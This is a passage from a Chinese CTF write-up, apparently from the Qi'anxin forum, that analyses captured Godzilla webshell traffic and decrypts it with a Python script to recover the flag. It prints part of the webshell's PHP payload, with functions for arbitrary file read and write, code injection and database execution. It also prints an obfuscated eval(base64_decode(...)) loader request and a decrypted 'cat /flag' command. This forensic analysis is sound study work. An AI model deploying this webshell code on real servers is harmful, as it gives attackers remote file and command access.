return mysql_exec($dbHost,$dbPort,$username,$password,$execType,$execSql);
}else if (extension_loaded("pdo")){
return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$execSql);
}else{
return "no extension";
}
}else if (extension_loaded("pdo")){
return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$execSql);
}else{
return "no extension";
}
return "no extension";
}
function base64Encode($data){
return base64_encode($data);
}
function test(){
return "ok";
}
function get($key){
global $parameters;
if (isset($parameters[$key])){
return $parameters[$key];
}else{
return null;
}
}
function getAllParameters(){
global $parameters;
return $parameters;
}
function includeCode(){
$classCode=get("binCode");
$codeName=get("codeName");
$_SES=&getSession();
$_SES[$codeName]=$classCode;
return "ok";
}
function base64Decode($string){
return base64_decode($string);
}
function convertFilePermissions($fileAttr){
$mod=0;
if (strpos($fileAttr,'R')!==false){
$mod=$mod+0444;
}
if (strpos($fileAttr,'W')!==false){
$mod=$mod+0222;
}
if (strpos($fileAttr,'X')!==false){
$mod=$mod+0111;
}
return $mod;
}
function close(){
@session_start();
$_SES=&getSession();
$_SES=null;
if (@session_destroy()){
return "ok";
}else{
return "fail!";
}
}
function bigFileDownload(){
$mode=get("mode");
$fileName=get("fileName");
$readByteNum=get("readByteNum");
$position=get("position");
if ($mode=="fileSize"){
if (@is_readable($fileName)){
return @filesize($fileName)."";
}else{
return "not read";
}
}elseif ($mode=="read"){
if (function_existsEx("fopen")&&function_existsEx("fread")&&function_existsEx("fseek")){
$handle=fopen($fileName,"ab+");
fseek($handle,$position);
$data=fread($handle,$readByteNum);
@fclose($handle);
if ($data!==false){
return $data;
}else{
return "cannot read file";
}
}else if (function_existsEx("file_get_contents")){
return file_get_contents($fileName,false,null,$position,$readByteNum);
}else{
return "no function";
}
}else{
return "no mode";
}
}
function bigFileUpload(){
$fileName=get("fileName");
$fileContents=get("fileContents");
$position=get("position");
if(function_existsEx("fopen")&&function_existsEx("fwrite")&&function_existsEx("fseek")){
$handle=fopen($fileName,"ab+");
if ($handle!==false){
fseek($handle,$position);
$len=fwrite($handle,$fileContents);
if ($len!==false){
return "ok";
}else{
return "cannot write file";
}
@fclose($handle);
}else{
return "cannot open file";
}
}else if (function_existsEx("file_put_contents")){
if (file_put_contents($fileName,$fileContents,FILE_APPEND)!==false){
return "ok";
}else{
return "writer fail";
}
}else{
return "no function";
}
}
function canCallGzipEncode(){
if (function_existsEx("gzencode")){
return "1";
}else{
return "0";
}
}
function canCallGzipDecode(){
if (function_existsEx("gzdecode")){
return "1";
}else{
return "0";
}
}
function bytesToInteger($bytes, $position) {
$val = 0;
$val = $bytes[$position + 3] & 0xff;
$val <<= 8;
$val |= $bytes[$position + 2] & 0xff;
$val <<= 8;
$val |= $bytes[$position + 1] & 0xff;
$val <<= 8;
$val |= $bytes[$position] & 0xff;
return $val;
}
function isGzipStream($bin){
if (strlen($bin)>=2){
$bin=substr($bin,0,2);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
switch ($typeCode) {
case 31139:
return true;
break;
default:
return false;
}
}else{
return false;
}
}
function getBytes($string) {
$bytes = array();
for($i = 0; $i < strlen($string); $i++){
array_push($bytes,ord($string[$i]));
}
return $bytes;
}
然后分析第一段的php我们可以知道哥斯拉是不落地木马,其变量都保存在内存进程中,然后每次都会用gzencode也就是gzip压缩,使用的php的方法所以我们只能用php的方法来解,我们继续分析后面的流量,最后一个流量是
pass=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBXayR3coAiZpBCIgACIgACIK0welNHbl1HIgACIK0wOpYTMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpkSeltGJskSY0FGZkgib1JHQoUGZvNmblhSZk92YuV2X0YTZzFmYg8GajVGIgACIgACIgoQD7kiNxwCMskSeltGJuM3chBHJoUDZthic0NnY1NHIvh2YlBCIgACIgACIK0wOpQWYvxWehBHJowWY2VGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljMX78f8Wo%2FyhTh1ICWCl3T2Dlffl9LdSpe0j5qneQcq98UNA0fsVlxxBe14XeR9%2FGMTU0pI7iA2M2ZQ%3D%3D
和
72a9c691ccdaab98fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=b4c4e1f6ddd2a488
重要的就是key的值key=fL1tMGI4YTljMX78f8Wo%2FyhTh1ICWCl3T2Dlffl9LdSpe0j5qneQcq98UNA0fsVlxxBe14XeR9%2FGMTU0pI7iA2M2ZQ%3D%3D
然后我们根据上面的思路写出解密脚本
import base64
import os
def decode(D,K):
D = list(D)
for i in range(len(D)):
c = K[i+1&15]
D[i] = D[i]^c
return bytes(D)
_pass = 'pass'
key = '3c6e0b8a9c15224a'
p='fL1tMGI4YTljMX78f8Wo/yhTh1ICWCl3T2Dlffl9LdSpe0j5qneQcq98UNA0fsVlxxBe14XeR9/GMTU0pI7iA2M2ZQ=='
a = os.popen(r'php -r echo(base64_encode(gzencode("test")));').read()
print(a)
p1 = base64.b64decode(p)
res = decode(p1,key.encode())
r1 = base64.b64encode(res).decode()
r2 = os.popen('php -r \'echo(gzdecode(base64_decode("'+r1+'")));\'').read()
print(r2)
然后key的值我们可以解出来
cmdLine
cat /flag
methodName
execCommand
下面的返回我们取16个字符后的base64fL1tMGI4YTljMn75e3jOBS5/V31Qd1NxKQMCe3h4KwFQfVAEVworCi0FfgB+BlWZhjRlQuTIIB5jMTU=我们可以解出:
flag{5db5b7b0bb74babb66e1522f3a6b1b12}
- 本文作者: Johnson666
- 本文来源: 奇安信攻防社区
- 原文链接: https://forum.butian.net/share/713
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!
